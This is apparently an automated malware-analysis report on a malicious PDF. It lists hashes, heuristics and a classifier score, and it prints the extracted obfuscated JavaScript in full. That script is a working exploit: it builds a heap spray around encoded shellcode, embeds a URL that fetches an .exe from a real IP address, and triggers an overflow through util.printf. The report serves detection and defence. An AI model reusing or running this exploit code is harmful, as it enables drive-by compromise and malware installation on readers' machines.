Malicious PDF — malware analysis report

Static analysis result for SHA-256 ce0bd0746ddffdc0…

MALICIOUS

PDF

3.1 KB Created: 2008-08-03 07:51:49 -09:03 Authoring application: Adobe InDesign CS3 (5.0) (via Adobe PDF Library 8.1) First seen: 2026-05-09
MD5: fe6caea3440be080a1208356b40f5257 SHA-1: 1d276c8a4bea78e6ce8d7434f25efff9896be07d SHA-256: ce0bd0746ddffdc0c6e327ceaf32e6af260c333f92163ae35b6fe6aa990ef508
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests that the JavaScript is obfuscated, likely to hide its malicious intent. The extracted artifact 'javascript_obj0013_001.js' further confirms the presence of JavaScript. The overall purpose appears to be the execution of this script, which is commonly used to download and execute further stages of malware.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    h8HObnLBMpU = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://66.96.207.64/xcNXW.exe?id=0&sid=51685860576754675564590a5f62157a146d187a47774e78487f4e67&e=98 Referenced by PDF JavaScript

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x37F 2639 bytes
SHA-256: ce1bd3c18038c6e393d6e619b93bc0b4b13fe18a8cfebd6d73ccb77b764aa691
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function JhMDEWxyZbkY() {
var url = "http://66.96.207.64/xcNXW.exe?id=0&sid=51685860576754675564590a5f62157a146d187a47774e78487f4e67&e=98";
var outValue = '';
   function abrvalg(arg) {
      var out = "";
      for (var i=0; i<arg.length;i=i+4) {
         var br1 = parseInt('0x'+arg[i] + arg[i+1], 16).toString(16);
         var br2 = parseInt('0x'+arg[i+2] + arg[i+3], 16).toString(16);
         if(br2.length == 1) { br2 = "0" + br2; };
         if(br1.length == 1) { br1 = "0" + br1; };
         out = out + "%u" + br1 + br2;
      }
      return out;
  }
	
for (i = 0; i < url.length; ) 
{
outValue += '%u' + ((i+1<url.length)?url.charCodeAt(i+1).toString(16):'00')+url.charCodeAt(i).toString(16);	
i = i + 2;
}

h8HObnLBMpU = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
"bfaze805xffecfffrf8b7fdf4eefef64efe3af9f"+
"6442f39zf64x6ee7erf03ezfeb64efb9036187e1a"+
"10z703ef11efefaa66b9zeb7787651107e1ef1f"+
"efefaa66bz9e7ca871r05f072defz0defefaa66b"+
"9e391870dx37079cef3rbefefaa66zb9ff2e870a"+
"960757ef29ezfefaa66arxffbd76f9a2c6615f7a"+
"ae806efeeb1ezf9a6664crbebaaexe8564b6f7ba"+
("07b9ef64efef87zbff5d9r9fxcz07807efef66eff").replace(new RegExp(/[zxswqr]/g),"")+
"3aa2ax6z42f6c66bfcfaa10rz87efefbfefaa6485"+
"fbb6edxba6407zf7ef8eefefraaexc28cfb3efc19"+
"1288raexbaf8a97efef9a10z64rcfe3xaaee8564b6"+
"f7baarzfx07efef85efb7exz8aaecdccbbc3410bcc"+
"f9axbcrbfaa648z5f3b6eabxa6407f7zefccefefef"+
"859xa1zr064cfe7aaed8564b6zf7baff07efef85e"+
"f64exfffraaee856z4b6f7baef07efefaeefbdb4"+
"0eec0xeecr0eec0eecz036cb5eb64bcz0d35bd180"+
"f1064bxa64rz03e792b264b9e39c6464d3f19bec"+
"97b91c9x964rzeccfdc1ca62642ae2cecdcb9e01"+
"9ff511dd5e7xr9b212zeece2af1d1ez0411d49ab1"+
"b50a0464b564erccb8932e36464a4zf3b532ece"+
"b64xec64b12a2xrdb2zefe71b071011zba10a3bda0a2efa1"
).replace(new RegExp(/[zxswqr]/g),"")));

home = unescape(outValue);

runnable = h8HObnLBMpU+home;
skipper = unescape(abrvalg(("0zx505"+"w0r5q0qq5").replace(new RegExp(/[zxswqr]/g),"")));

while (skipper.length<20+runnable.length)
{
	skipper+=skipper;
}

skipper1 = skipper.substring(0, 20+runnable.length);
skipper2 = skipper.substring(0, skipper.length-20-runnable.length);

while(skipper2.length<(0x40000-20-runnable.length))
{
	skipper2 += skipper2;
	skipper2 += skipper1;//skipper2 = skipper2+skipper2+skipper1;
}

context = new Array();
ii=-1;

while(++ii<1414)
{
	context[ii] = skipper2 + runnable;
}

var n2m2 = 12;
for(i = 0; i < 18; i++){ n2m2 = n2m2 + "9"; }
for(i = 0; i < 276; i++){ n2m2 = n2m2 + "8"; }
var str = "l25k34u35d30u30d30l66";
var fyt = unescape(str.replace(new RegExp(/[lkud]/g),"%"));
var fmck = util;
fmck.printf(fyt, n2m2);
	};

Open this report in the interactive analyzer, or submit your own file for analysis.